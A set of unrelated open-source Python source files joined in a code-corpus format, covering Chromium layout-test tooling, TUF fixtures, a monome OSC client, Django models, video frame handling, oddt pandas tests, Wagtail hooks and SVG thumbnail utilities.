def _path_to_wdiff(self):
"""Returns the full path to the wdiff binary, or None if it is not available.
This is likely used only by wdiff_text()"""
for path in ("/usr/bin/wdiff", "/usr/bin/dwdiff"):
if self._filesystem.exists(path):
return path
return None
def _webkit_baseline_path(self, platform):
"""Return the full path to the top of the baseline tree for a
given platform."""
return self._filesystem.join(self.layout_tests_dir(), 'platform', platform)
def _driver_class(self):
"""Returns the port's driver implementation."""
return driver.Driver
def output_contains_sanitizer_messages(self, output):
if not output:
return None
if 'AddressSanitizer' in output:
return 'AddressSanitizer'
if 'MemorySanitizer' in output:
return 'MemorySanitizer'
return None
def _get_crash_log(self, name, pid, stdout, stderr, newer_than):
if self.output_contains_sanitizer_messages(stderr):
# Running the symbolizer script can take a lot of memory, so we need to
# serialize access to it across all the concurrently running drivers.
llvm_symbolizer_path = self.path_from_chromium_base(
'third_party', 'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer')
if self._filesystem.exists(llvm_symbolizer_path):
env = os.environ.copy()
env['LLVM_SYMBOLIZER_PATH'] = llvm_symbolizer_path
else:
env = None
sanitizer_filter_path = self.path_from_chromium_base('tools', 'valgrind', 'asan', 'asan_symbolize.py')
sanitizer_strip_path_prefix = 'Release/../../'
if self._filesystem.exists(sanitizer_filter_path):
stderr = self._executive.run_command(
['flock', sys.executable, sanitizer_filter_path, sanitizer_strip_path_prefix], input=stderr, decode_output=False, env=env)
name_str = name or '<unknown process name>'
pid_str = str(pid or '<unknown>')
# We require stdout and stderr to be bytestrings, not character strings.
if stdout:
assert isinstance(stdout, str)
stdout_lines = stdout.decode('utf8', 'replace').splitlines()
else:
stdout_lines = [u'<empty>']
if stderr:
assert isinstance(stderr, str)
stderr_lines = stderr.decode('utf8', 'replace').splitlines()
else:
stderr_lines = [u'<empty>']
return (stderr, 'crash log for %s (pid %s):\n%s\n%s\n' % (name_str, pid_str,
'\n'.join(('STDOUT: ' + l) for l in stdout_lines),
'\n'.join(('STDERR: ' + l) for l in stderr_lines)))
def look_for_new_crash_logs(self, crashed_processes, start_time):
pass
def look_for_new_samples(self, unresponsive_processes, start_time):
pass
def sample_process(self, name, pid):
pass
def physical_test_suites(self):
return [
# For example, to turn on force-compositing-mode in the svg/ directory:
# PhysicalTestSuite('svg', ['--force-compositing-mode']),
PhysicalTestSuite('fast/text', ["--enable-direct-write", "--enable-font-antialiasing"]),
]
def virtual_test_suites(self):
if self._virtual_test_suites is None:
path_to_virtual_test_suites = self._filesystem.join(self.layout_tests_dir(), 'VirtualTestSuites')
assert self._filesystem.exists(path_to_virtual_test_suites), 'LayoutTests/VirtualTestSuites not found'
try:
test_suite_json = json.loads(self._filesystem.read_text_file(path_to_virtual_test_suites))
self._virtual_test_suites = [VirtualTestSuite(**d) for d in test_suite_json]
except ValueError as e:
raise ValueError("LayoutTests/VirtualTestSuites is not a valid JSON file: %s" % str(e))
return self._virtual_test_suites
def _all_virtual_tests(self, suites):
tests = []
for suite in suites:
self._populate_virtual_suite(suite)
tests.extend(suite.tests.keys())
return tests
def _virtual_tests_matching_paths(self, paths, suites):
tests = []
for suite in suites:
if any(p.startswith(suite.name) for p in paths):
self._populate_virtual_suite(suite)
for test in suite.tests:
if any(test.startswith(p) for p in paths):
tests.append(test)
return tests
def _populate_virtual_suite(self, suite):
if not suite.tests:
base_tests = self._real_tests([suite.base])
suite.tests = {}
for test in base_tests:
suite.tests[test.replace(suite.base, suite.name, 1)] = test
def is_virtual_test(self, test_name):
return bool(self.lookup_virtual_suite(test_name))
def lookup_virtual_suite(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite
return None
def lookup_virtual_test_base(self, test_name):
suite = self.lookup_virtual_suite(test_name)
if not suite:
return None
return test_name.replace(suite.name, suite.base, 1)
def lookup_virtual_test_args(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite.args
return []
def lookup_virtual_reference_args(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite.reference_args
return []
def lookup_physical_test_args(self, test_name):
for suite in self.physical_test_suites():
if test_name.startswith(suite.name):
return suite.args
return []
def lookup_physical_reference_args(self, test_name):
for suite in self.physical_test_suites():
if test_name.startswith(suite.name):
return suite.reference_args
return []
def should_run_as_pixel_test(self, test_input):
if not self._options.pixel_tests:
return False
if self._options.pixel_test_directories:
return any(test_input.test_name.startswith(directory) for directory in self._options.pixel_test_directories)
# TODO(burnik): Make sure this is the right way to do it.
if self.is_wpt_enabled() and self.is_wpt_test(test_input.test_name):
return False
return True
def _modules_to_search_for_symbols(self):
path = self._path_to_webcore_library()
if path:
return [path]
return []
def _symbols_string(self):
symbols = ''
for path_to_module in self._modules_to_search_for_symbols():
try:
symbols += self._executive.run_command(['nm', path_to_module], error_handler=self._executive.ignore_error)
except OSError as e:
_log.warning("Failed to run nm: %s. Can't determine supported features correctly." % e)
return symbols
# Ports which use compile-time feature detection should define this method and return
# a dictionary mapping from symbol substrings to possibly disabled test directories.
# When the symbol substrings are not matched, the directories will be skipped.
# If ports don't ever enable certain features, then those directories can just be
# in the Skipped list instead of compile-time-checked here.
def _missing_symbol_to_skipped_tests(self):
if self.PORT_HAS_AUDIO_CODECS_BUILT_IN:
return {}
else:
return {
"ff_mp3_decoder": ["webaudio/codec-tests/mp3"],
"ff_aac_decoder": ["webaudio/codec-tests/aac"],
}
def _has_test_in_directories(self, directory_lists, test_list):
if not test_list:
return False
directories = itertools.chain.from_iterable(directory_lists)
for directory, test in itertools.product(directories, test_list):
if test.startswith(directory):
return True
return False
def _skipped_tests_for_unsupported_features(self, test_list):
# Only check the symbols if there are tests in the test_list that might get skipped.
# This is a performance optimization to avoid calling nm.
# Runtime feature detection not supported, fallback to static detection:
# Disable any tests for symbols missing from the executable or libraries.
if self._has_test_in_directories(self._missing_symbol_to_skipped_tests().values(), test_list):
symbols_string = self._symbols_string()
if symbols_string is not None:
return reduce(operator.add, [directories for symbol_substring, directories in self._missing_symbol_to_skipped_tests().items() if symbol_substring not in symbols_string], [])
return []
def _convert_path(self, path):
"""Handles filename conversion for subprocess command line args."""
# See note above in diff_image() for why we need this.
if sys.platform == 'cygwin':
return cygpath(path)
return path
def _build_path(self, *comps):
return self._build_path_with_target(self._options.target, *comps)
def _build_path_with_target(self, target, *comps):
# Note that we don't do the option caching that the
# base class does, because finding the right directory is relatively
# fast.
target = target or self.get_option('target')
return self._static_build_path(self._filesystem, self.get_option('build_directory'),
self.path_from_chromium_base(), target, comps)
def _check_driver_build_up_to_date(self, target):
# We should probably get rid of this check altogether as it has
# outlived its usefulness in a GN-based world, but for the moment
# we will just check things if they are using the standard
# Debug or Release target directories.
if target not in ('Debug', 'Release'):
return True
try:
debug_path = self._path_to_driver('Debug')
release_path = self._path_to_driver('Release')
debug_mtime = self._filesystem.mtime(debug_path)
release_mtime = self._filesystem.mtime(release_path)
if ((debug_mtime > release_mtime and target == 'Release') or
(release_mtime > debug_mtime and target == 'Debug')):
most_recent_binary = 'Release' if target == 'Debug' else 'Debug'
_log.warning('You are running the %s binary. However the %s binary appears to be more recent. '
'Please pass --%s.', target, most_recent_binary, most_recent_binary.lower())
_log.warning('')
# This will fail if we don't have both a debug and release binary.
# That's fine because, in this case, we must already be running the
# most up-to-date one.
except OSError:
pass
return True
def _chromium_baseline_path(self, platform):
if platform is None:
platform = self.name()
return self.path_from_webkit_base('LayoutTests', 'platform', platform)
class VirtualTestSuite(object):
def __init__(self, prefix=None, base=None, args=None, references_use_default_args=False):
assert base
assert args
assert prefix.find('/') == -1, "Virtual test suites prefixes cannot contain /'s: %s" % prefix
self.name = 'virtual/' + prefix + '/' + base
self.base = base
self.args = args
self.reference_args = [] if references_use_default_args else args
self.tests = {}
def __repr__(self):
return "VirtualTestSuite('%s', '%s', %s, %s)" % (self.name, self.base, self.args, self.reference_args)
class PhysicalTestSuite(object):
def __init__(self, base, args, reference_args=None):
self.name = base
self.base = base
self.args = args
self.reference_args = args if reference_args is None else reference_args
self.tests = set()
def __repr__(self):
return "PhysicalTestSuite('%s', '%s', %s, %s)" % (self.name, self.base, self.args, self.reference_args)
| was4444/chromium.src | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/port/base.py | Python | bsd-3-clause | 78,408 |
# Delegation tree
#
# Targets
# / \
# a f
# / \
# b e
# / \
# c d
#
# No terminating delegations.
#
# Roles should be evaluated in the order:
# Targets > a > b > c > d > e > f
from fixtures.builder import FixtureBuilder
def build():
FixtureBuilder('TUFTestFixture3LevelDelegation')\
.publish(with_client=True)\
.create_target('targets.txt')\
.delegate('a', ['*.txt'])\
.create_target('a.txt', signing_role='a')\
.delegate('b', ['*.txt'], parent='a') \
.create_target('b.txt', signing_role='b') \
.delegate('c', ['*.txt'], parent='b') \
.create_target('c.txt', signing_role='c') \
.delegate('d', ['*.txt'], parent='b') \
.create_target('d.txt', signing_role='d') \
.delegate('e', ['*.txt'], parent='a') \
.create_target('e.txt', signing_role='e') \
.delegate('f', ['*.txt']) \
.create_target('f.txt', signing_role='f') \
.publish()
| theupdateframework/go-tuf | client/testdata/php-tuf-fixtures/TUFTestFixture3LevelDelegation/__init__.py | Python | bsd-3-clause | 1,041 |
import liblo
import time
from liblo import make_method
target = liblo.Address(12002)
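# Minimal serialosc client sketch: 12002 is serialosc's default discovery
# port. We ask serialosc to list attached monome devices, point each device's
# OSC output back at this server, and echo key presses as LED state.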
class SerialOsc(liblo.Server):
def __init__(self, *args, **kwargs):
liblo.Server.__init__(self, *args, **kwargs)
self.devices = []
@make_method('/serialosc/device', 'ssi')
def list_device(self, path, args):
print path, args
id_, type_, port = args
print port
device = liblo.Address(port)
liblo.send(device, '/sys/prefix', 'monome')
liblo.send(device, '/sys/host', 'localhost')
liblo.send(device, '/sys/port', self.port)
self.devices.append(device)
@make_method('/monome/grid/key', 'iii')
def button(self, path, args):
(x, y, b) = args
print x, y
for d in self.devices:
liblo.send(d, '/monome/grid/led/set', x, y, b)
@make_method(None, None)
def fallback(self, path, args):
print path, args
s = SerialOsc()
liblo.send(target, '/serialosc/list', 'localhost', s.port)
while True:
s.recv(100)
| litghost/etherdream_toys | monome_test.py | Python | bsd-3-clause | 1,048 |
from django.db import models
from django.contrib.postgres.fields import ArrayField
from localflavor.us.us_states import US_STATES
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from common.models import TimestampedModel
import uuid
STATE_NATL_CHOICES = (('US', 'National'),) + US_STATES
STATE_NATL_LOOKUP = dict(STATE_NATL_CHOICES)
class Category(TimestampedModel):
name = models.CharField(max_length=50)
slug = models.SlugField(max_length=70, editable=False)
parent = models.ForeignKey("self", related_name="children", null=True, blank=True)
class Meta:
verbose_name = "Category"
verbose_name_plural = "Categories"
ordering = ['parent__name', 'name']
unique_together = ("name", "parent")
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Category, self).save(*args, **kwargs)
@property
def path(self):
return self._calculate_pathname(False)
@property
def slugged_path(self):
return self._calculate_pathname(True)
def _calculate_pathname(self, slugged):
name = self.slug if slugged else self.name
if self.parent:
parent_name = str(self.parent.slug) if slugged else str(self.parent.name)
return "{parent_name}/{name}".format(name=name, parent_name=parent_name)
else:
return "{name}".format(name=name)
def get_absolute_url(self):
kwargs = {'category': self.parent.slug if self.parent else self.slug}
if self.parent:
kwargs['subcategory'] = self.slug
return reverse('datasets-by-category', kwargs=kwargs)
def __str__(self):
return self.path
class Dataset(TimestampedModel):
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
# General
title = models.TextField()
url = models.URLField(blank=True, null=True, max_length=500)
description = models.TextField(blank=True)
group_name = models.CharField(db_index=True, max_length=150,
help_text="Name of group administering dataset.")
categories = models.ManyToManyField("Category")
tags = ArrayField(models.CharField(max_length=50), blank=True, default=list,
help_text="Tags, separated by commas.")
# Location
states = ArrayField(models.CharField(choices=STATE_NATL_CHOICES, max_length=2), default=list,
help_text="List of state abbreviations: NC, CA, PA, etc. Use 'US' for a national dataset")
division_names = ArrayField(models.CharField(max_length=150), default=list,
help_text='Describes one or more geographic divisions such as a city or county.')
# Resource Information
resource_location = models.TextField(blank=True,
help_text='Describes where in a resource to find the dataset.')
updated = models.NullBooleanField(help_text="Does this resource get updated?")
frequency = models.CharField(blank=True, max_length=50,
help_text="How often this resource is updated.")
sectors = ArrayField(models.CharField(max_length=40), blank=True, default=list,
help_text="Sectors responsible for the data resource, such as \
'Private' or 'Government' or 'Non-Profit', separated by commas.")
# Data Properties
mappable = models.NullBooleanField(help_text="Can the information be put on a map, i.e. a crime map?")
population_data = models.NullBooleanField(help_text="Does this dataset include population data?")
formats = ArrayField(models.CharField(max_length=40), blank=True, default=list,
help_text="Enter formats, separated by commas")
data_range = models.CharField(blank=True, max_length=100,
help_text="Human-readable description of the time period covered in the data.")
# Availability
internet_available = models.NullBooleanField(help_text="Is this dataset available online?")
access_type = models.CharField(db_index=True, blank=True, max_length=50,
help_text="Description of how data can be accessed, and if it is machine readable.")
# Associated Information
associated_legislation = models.TextField(blank=True)
associated_grant = models.TextField(blank=True,
help_text="Name of associated grant that funds the dataset, if available.")
class Meta:
get_latest_by = 'created_at'
verbose_name = "Dataset"
verbose_name_plural = "Datasets"
ordering = ['states', '-updated_at', 'url']
def states_expanded(self):
return (STATE_NATL_LOOKUP[s] for s in self.states)
def get_states_display(self):
return ", ".join(self.states_expanded())
def get_states_abbr_display(self):
return ", ".join(self.states)
def get_division_names_display(self):
return ", ".join(self.division_names)
def get_absolute_url(self):
return reverse('dataset-detail', args=[str(self.uuid)])
def __str__(self):
return "{states} ({sectors}): {title}".format(states=self.get_states_display(),
title=self.title,
sectors=",".join(self.sectors))
| sunlightlabs/hall-of-justice | cjdata/models.py | Python | bsd-3-clause | 5,438 |
# -*- coding: utf-8 -*-
import sys
def main():
sys.exit(42)
def test_is_compiled():
global __cached__, __file__
try:
source = __cached__ or __file__
except NameError:
source = __file__
assert source.endswith('.pyc')
def test_extras():
from extension_dist.test_ext import get_the_answer
assert get_the_answer() == 42
def test_no_extras():
try:
import extension_dist # noqa
except ImportError:
pass
else:
assert False, "extra was insatlled when it shouldn't have been"
| dairiki/humpty | tests/dist1/dist1.py | Python | bsd-3-clause | 558 |
# -*- coding: utf8 -*-
"""
This is part of shot detector.
Produced by w495 at 2017.05.04 04:18:27
"""
from __future__ import absolute_import, division, print_function
import datetime
import logging
import av
import six
# noinspection PyUnresolvedReferences
from av.container import InputContainer
from shot_detector.objects import (
BaseFrame,
FramePosition
)
from shot_detector.utils.common import get_objdata_dict
from shot_detector.utils.log_meta import (
LogMeta,
ignore_log_meta,
should_be_overloaded
)
class BaseHandler(six.with_metaclass(LogMeta)):
"""
Finite State Machine for video handling.
Works with video at a low level.
Splits video into frames.
You should implement the `handle_frame` method.
"""
__logger = logging.getLogger(__name__)
def handle_video(self,
input_uri='',
format_name=None,
**kwargs):
"""
Runs video handling
:param str input_uri:
file name of input video or path to resource
for example `http://localhost:8090/live.flv`
You can use any string, that can be accepted
by input ffmpeg-parameter. For example:
* 'udp://127.0.0.1:1234';
* 'tcp://localhost:1234?listen';
* 'http://localhost:8090/live.flv'.
:param str format_name:
name of video format. Use it for hardware devices.
:param dict kwargs: any options for consecutive methods,
ignored and passed through.
:return:
"""
# noinspection PyUnresolvedReferences
video_container = av.open(
file=input_uri,
format=format_name,
)
logger = self.__logger
if logger.isEnabledFor(logging.INFO):
self.log_tree(
logger,
get_objdata_dict(
video_container,
ext_classes_keys=['format', 'layout']
)
)
result = self.handle_video_container(video_container, **kwargs)
return result
# noinspection PyUnusedLocal
@ignore_log_meta
def log_tree(self, logger, value, level=1, **_):
"""
:param logging.Logger logger:
:param Any value:
:param int level:
:param dict _: any options for consecutive methods,
ignored and passed through.
:return:
"""
space = ' ⇾ ' * level
for key, value in six.iteritems(value):
if isinstance(value, dict):
type_ = value.get('type')
if type_:
key += " [%s]" % str(type_)
name = value.get('name')
if name:
key += " {%s} " % str(name)
long_name = value.get('long_name')
if long_name:
key += " «%s»" % str(long_name)
logger.info("%s %s:" % (space, key))
self.log_tree(logger, value, level=level + 1)
else:
logger.info("%s %s: %s" % (space, key, value))
def handle_video_container(self, video_container, **kwargs):
"""
:param av.container.InputContainer video_container:
input video container, in terms of
av open video file or stream.
:param kwargs: any options for consecutive methods,
ignored and passed through.
:return:
"""
assert isinstance(video_container, InputContainer)
packet_seq = self.packets(video_container, **kwargs)
packet_seq = self.filter_packets(packet_seq, **kwargs)
frame_seq = self.frames(packet_seq, **kwargs)
filtered_seq = self.filter_frames(frame_seq, **kwargs)
handled_seq = self.handle_frames(filtered_seq, **kwargs)
list(handled_seq)
return None
@staticmethod
def packets(video_container, stream_seq=None, **_):
"""
:param av.container.InputContainer video_container:
:param stream_seq:
:param _:
:return:
"""
if stream_seq:
stream_seq = tuple(stream_seq)
return video_container.demux(streams=stream_seq)
@should_be_overloaded
def filter_packets(self, packet_seq, **_):
"""
:param collections.Iterable packet_seq:
:param dict _: ignored.
:return:
"""
return packet_seq
@staticmethod
def packet_frame_seqs(packet_seq, **_):
"""
:param collections.Iterable packet_seq:
:param dict _: ignored.
:return:
"""
for packet in packet_seq:
decoded = packet.decode()
yield iter(decoded)
def frames(self, packet_seq, **kwargs):
"""
:param collections.Iterable packet_seq:
:param dict kwargs: any options for consecutive methods,
ignored and passed through.
:return:
"""
packet_frame_seqs = self.packet_frame_seqs(packet_seq, **kwargs)
global_number = 0
for packet_number, frame_seq in enumerate(packet_frame_seqs):
for frame_number, source_frame in enumerate(frame_seq):
position = FramePosition(
global_number=global_number,
frame_number=frame_number,
packet_number=packet_number,
)
frame = self.frame(
source=source_frame,
position=position,
)
yield frame
global_number += 1
def frame(self, source=None, position=None):
"""
:param source:
:param position:
:return:
"""
frame = BaseFrame(
av_frame=source,
position=position,
)
return frame
@should_be_overloaded
def filter_frames(self, frame_seq, **_):
"""
:param collections.Iterable frame_seq:
:param dict _: ignored.
:return:
"""
return frame_seq
@should_be_overloaded
def handle_frames(self, frame_seq, **_):
"""
:param collections.Iterable frame_seq:
:param dict _: ignored.
:return:
"""
return frame_seq
@staticmethod
def limit_seq(sequence, first=0, last=10, as_stream=False, **_):
"""
:param sequence:
:param float first:
:param float last:
:param bool as_stream:
:param _:
:return:
"""
at_start = None
for unit in sequence:
BaseHandler.__logger.debug('unit = %s', unit)
current = float(unit.time)
if as_stream:
if at_start is None:
at_start = current
current = current - at_start
if last <= current:
sequence.close()
if first <= current:
yield unit
def log_seq(self,
sequence,
fmt="[{delta_time}] {item}",
logger=None,
log=None,
**kwargs):
"""
Prints sequence item by item
:param sequence:
:param fmt:
:param logger:
:param log:
:param kwargs:
:return:
"""
start_time = datetime.datetime.now()
if logger is None:
logger = logging.getLogger(__name__)
if log is None:
log = logger.info
if fmt is None:
fmt = "WRONG FORMAT …"
for item in sequence:
now_time = datetime.datetime.now()
delta_time = now_time - start_time
item_dict = kwargs
for attr in dir(item):
if not attr.startswith('__'):
item_dict['item.{}'.format(attr)] \
= getattr(item, attr)
log(fmt.format(
delta_time=delta_time,
self=self,
item=item,
**item_dict
))
yield item
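# Illustrative usage sketch (not part of the original module;
# 'CountingHandler' and 'video.mp4' are hypothetical). Subclasses override
# the @should_be_overloaded hooks, e.g.:
#
#     class CountingHandler(BaseHandler):
#         def handle_frames(self, frame_seq, **kwargs):
#             for number, frame in enumerate(frame_seq):
#                 yield frame
#
#     CountingHandler().handle_video(input_uri='video.mp4')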
| w495/python-video-shot-detector | shot_detector/handlers/base_handler.py | Python | bsd-3-clause | 8,236 |
from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
# admin.autodiscover()
urlpatterns = patterns('',
# Examples:
url(r'^$', 'formsfive.views.example', name='example'),
)
| iamjstates/django-formsfive | urls.py | Python | bsd-3-clause | 268 |
import os
from tempfile import NamedTemporaryFile
from numpy.testing import assert_array_equal
import pandas as pd
import oddt
import oddt.pandas as opd
test_data_dir = os.path.dirname(os.path.abspath(__file__))
input_fname = os.path.join(test_data_dir, 'data/dude/xiap/actives_docked.sdf')
def test_classes():
""" Test oddt.pandas classes behavior """
df = opd.read_sdf(input_fname)
# Check classes inheritance
assert isinstance(df, opd.ChemDataFrame)
assert isinstance(df, pd.DataFrame)
assert isinstance(df['mol'], opd.ChemSeries)
assert isinstance(df['mol'], pd.Series)
assert isinstance(df, pd.DataFrame)
# Check custom metadata
assert hasattr(df, '_molecule_column')
assert hasattr(df[['mol']], '_molecule_column')
assert df._molecule_column == df[['mol']]._molecule_column
# Check if slicing perserve classes
assert isinstance(df.head(1), opd.ChemDataFrame)
assert isinstance(df['mol'].head(1), opd.ChemSeries)
def test_reading():
""" Test reading molecule files to ChemDataFrame """
df = opd.read_sdf(input_fname)
# Check dimensions
assert len(df) == 100
assert len(df.columns) == 15
df = opd.read_sdf(input_fname, smiles_column='smi_col')
assert 'smi_col' in df.columns
df = opd.read_sdf(input_fname,
molecule_column=None,
molecule_name_column=None,
usecols=['name'])
assert 'mol' not in df.columns
assert 'mol_name' not in df.columns
assert len(df.columns) == 1
df = opd.read_sdf(input_fname,
usecols=['name', 'uniprot_id', 'act'])
assert len(df.columns) == 5 # 3 from use_cols + 1 'mol' + 1 'mol_name'
assert 'uniprot_id' in df.columns
assert 'smi_col' not in df.columns
# Chunk reading
chunks = []
for chunk in opd.read_sdf(input_fname, chunksize=10):
assert len(chunk) == 10
chunks.append(chunk)
assert len(chunks) == 10
df = pd.concat(chunks)
# Check dimensions
assert len(df) == 100
def test_substruct_sim_search():
df = opd.read_sdf(input_fname).head(10)
query = oddt.toolkit.readstring('smi', 'C(=O)(N1C[C@H](C[C@H]1C(=O)N[C@@H]1CCCc2c1cccc2)Oc1ccccc1)[C@@H](NC(=O)[C@H](C)NC)C1CCCCC1')
ge_answer = [True, True, True, False, True, False, False, False, False, False]
assert (df.mol >= query).tolist() == ge_answer
assert (query <= df.mol).tolist() == ge_answer
le_answer = [True, True, True, True, True, True, False, False, False, True]
assert (df.mol <= query).tolist() == le_answer
assert (query >= df.mol).tolist() == le_answer
sim = df.mol.calcfp() | query.calcfp()
assert sim.dtype == 'float64'
def test_mol2():
"""Writing and reading of mol2 fils to/from ChemDataFrame"""
if oddt.toolkit.backend == 'ob':
df = opd.read_sdf(input_fname)
with NamedTemporaryFile(suffix='.mol2') as f:
df.to_mol2(f.name)
df2 = opd.read_mol2(f.name)
assert df.shape == df2.shape
chunks = []
for chunk in opd.read_mol2(f.name, chunksize=10):
assert len(chunk) == 10
chunks.append(chunk)
df3 = pd.concat(chunks)
assert df.shape == df3.shape
with NamedTemporaryFile(suffix='.mol2') as f:
df.to_mol2(f.name, columns=['name', 'uniprot_id', 'act'])
df2 = opd.read_mol2(f.name)
assert len(df2.columns) == 5
def test_sdf():
"""Writing ChemDataFrame to SDF molecular files"""
df = opd.read_sdf(input_fname)
with NamedTemporaryFile(suffix='.sdf') as f:
df.to_sdf(f.name)
df2 = opd.read_sdf(f.name)
assert_array_equal(df.columns.sort_values(), df2.columns.sort_values())
with NamedTemporaryFile(suffix='.sdf') as f:
df.to_sdf(f.name, columns=['name', 'uniprot_id', 'act'])
df2 = opd.read_sdf(f.name)
assert len(df2.columns) == 5
def test_csv():
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
df['act'] = df['act'].astype(float)
df['name'] = df['name'].astype(int)
with NamedTemporaryFile(suffix='.csv', mode='w+') as f:
for str_buff in (f, f.name):
df.to_csv(str_buff, index=False)
f.seek(0)
df2 = opd.read_csv(f.name, smiles_to_molecule='mol',
molecule_column='mol')
assert df.shape == df2.shape
assert df.columns.tolist() == df2.columns.tolist()
assert df.dtypes.tolist() == df2.dtypes.tolist()
with NamedTemporaryFile(suffix='.csv', mode='w+') as f:
for str_buff in (f, f.name):
df.to_csv(str_buff, index=False, columns=['name', 'act'])
f.seek(0)
df2 = pd.read_csv(f.name)
assert df[['name', 'act']].shape == df2.shape
assert df[['name', 'act']].columns.tolist() == df2.columns.tolist()
assert df[['name', 'act']].dtypes.tolist() == df2.dtypes.tolist()
def test_excel():
# just check if it doesn't fail
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
df = df.head(10) # it's slow so use first 10 mols
df['act'] = df['act'].astype(float)
df['name'] = df['name'].astype(int)
with NamedTemporaryFile(suffix='.xls', mode='w') as f:
df.to_excel(f.name, index=False)
writer = pd.ExcelWriter(f.name, engine='xlsxwriter')
df.to_excel(writer, index=False)
def test_chemseries_writers():
df = opd.read_sdf(input_fname,
columns=['mol', 'name', 'chembl_id', 'dude_smiles', 'act'])
mols = df['mol']
# SMILES
with NamedTemporaryFile(suffix='.ism', mode='w') as f:
mols.to_smiles(f)
for mol in oddt.toolkit.readfile('smi', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
# SDF
with NamedTemporaryFile(suffix='.sdf', mode='w') as f:
mols.to_sdf(f)
for mol in oddt.toolkit.readfile('sdf', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
# mol2
if oddt.toolkit.backend == 'ob':
with NamedTemporaryFile(suffix='.mol2', mode='w') as f:
mols.to_mol2(f)
for mol in oddt.toolkit.readfile('mol2', f.name):
assert isinstance(mol, oddt.toolkit.Molecule)
def test_ipython():
"""iPython Notebook molecule rendering in SVG"""
df = opd.read_sdf(input_fname)
# mock ipython
oddt.toolkit.ipython_notebook = True
# png
oddt.toolkit.image_backend = 'png'
html = df.head(1).to_html()
assert '<img src="data:image/png;base64,' in html
# svg
oddt.toolkit.image_backend = 'svg'
html = df.head(1).to_html()
assert '<svg' in html
oddt.toolkit.ipython_notebook = False
| oddt/oddt | tests/test_pandas.py | Python | bsd-3-clause | 6,915 |
from django.conf import settings
from django.conf.urls import url
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.utils.html import format_html, format_html_join
from wagtail.wagtailcore import hooks
from .views import get_full_image_url
@hooks.register('register_admin_urls')
def register_admin_urls():
return [
url(r'^full_image/(\d+)/$', get_full_image_url),
]
@hooks.register('insert_editor_css')
def editor_css():
return format_html(
'<link rel="stylesheet" href="{}">',
static('annotated-image/annotated-image.css')
)
@hooks.register('insert_editor_js')
def editor_js():
js_files = [
'annotated-image/annotated-image-handler.js',
'annotated-image/jquery.annotate.js',
]
return format_html_join('\n', '<script src="{0}{1}"></script>',
((settings.STATIC_URL, filename) for filename in js_files)
)
| takeflight/wagtailannotatedimage | wagtailannotatedimage/wagtail_hooks.py | Python | bsd-3-clause | 923 |
from django.conf.urls.defaults import *
import price_tracker.views
from django.contrib import admin
admin.autodiscover()
handler500 = 'djangotoolbox.errorviews.server_error'
urlpatterns = patterns(
'',
(r'^admin/', include(admin.site.urls)),
(r'results', price_tracker.views.results),
(r'^$', price_tracker.views.index),
('aboutus', 'django.views.generic.simple.direct_to_template',
{'template': 'price_tracker/aboutus.html'}),
)
| vinayan3/clpricehistory | urls.py | Python | bsd-3-clause | 458 |
import os
import StringIO
import subprocess
import tempfile
from base64 import b64encode
from django.conf import settings
from django.core.files.storage import default_storage as storage
from PIL import Image
import olympia.core.logger
log = olympia.core.logger.getLogger('z.versions.utils')
def write_svg_to_png(svg_content, out):
# When settings.DEBUG is on (i.e. locally), don't delete the SVGs.
tmp_args = {
'dir': settings.TMP_PATH, 'mode': 'wb', 'suffix': '.svg',
'delete': not settings.DEBUG}
with tempfile.NamedTemporaryFile(**tmp_args) as temporary_svg:
temporary_svg.write(svg_content)
temporary_svg.flush()
try:
if not os.path.exists(os.path.dirname(out)):
os.makedirs(os.path.dirname(out))
command = [
settings.RSVG_CONVERT_BIN,
'--output', out,
temporary_svg.name,
]
subprocess.check_call(command)
except IOError as io_error:
log.debug(io_error)
return False
except subprocess.CalledProcessError as process_error:
log.debug(process_error)
return False
return True
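# Illustrative usage (not in the original; assumes settings.RSVG_CONVERT_BIN
# points at a working rsvg-convert binary and the output path is writable):
#
#     ok = write_svg_to_png(svg_bytes, '/tmp/previews/header.png')
#     # ok is False when conversion fails; errors are logged, not raised.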
def encode_header_image(path):
try:
with storage.open(path, 'rb') as image:
header_blob = image.read()
with Image.open(StringIO.StringIO(header_blob)) as header_image:
(width, height) = header_image.size
src = 'data:image/%s;base64,%s' % (
header_image.format.lower(), b64encode(header_blob))
except IOError as io_error:
log.debug(io_error)
return (None, 0, 0)
return (src, width, height)
class AdditionalBackground(object):
@classmethod
def split_alignment(cls, alignment):
alignments = alignment.split()
# e.g. "center top"
if len(alignments) >= 2:
return (alignments[0], alignments[1])
elif len(alignments) == 1:
# e.g. "left", which is the same as 'left center'
if alignments[0] in ['left', 'right']:
return (alignments[0], 'center')
# e.g. "top", which is the same as 'center top'
else:
return ('center', alignments[0])
else:
return ('', '')
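# Illustrative results (not in the original): 'center top' -> ('center',
# 'top'); 'left' -> ('left', 'center'); 'top' -> ('center', 'top');
# '' -> ('', '').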
def __init__(self, path, alignment, tiling, header_root):
# If there is an unequal number of alignments or tilings to srcs, the
# value will be None, so use the defaults.
self.alignment = (alignment or 'right top').lower()
self.tiling = (tiling or 'no-repeat').lower()
self.src, self.width, self.height = encode_header_image(
os.path.join(header_root, path))
def calculate_pattern_offsets(self, svg_width, svg_height):
align_x, align_y = self.split_alignment(self.alignment)
if align_x == 'right':
self.pattern_x = svg_width - self.width
elif align_x == 'center':
self.pattern_x = (svg_width - self.width) / 2
else:
self.pattern_x = 0
if align_y == 'bottom':
self.pattern_y = svg_height - self.height
elif align_y == 'center':
self.pattern_y = (svg_height - self.height) / 2
else:
self.pattern_y = 0
if self.tiling in ['repeat', 'repeat-x'] or self.width > svg_width:
self.pattern_width = self.width
else:
self.pattern_width = svg_width
if self.tiling in ['repeat', 'repeat-y'] or self.height > svg_height:
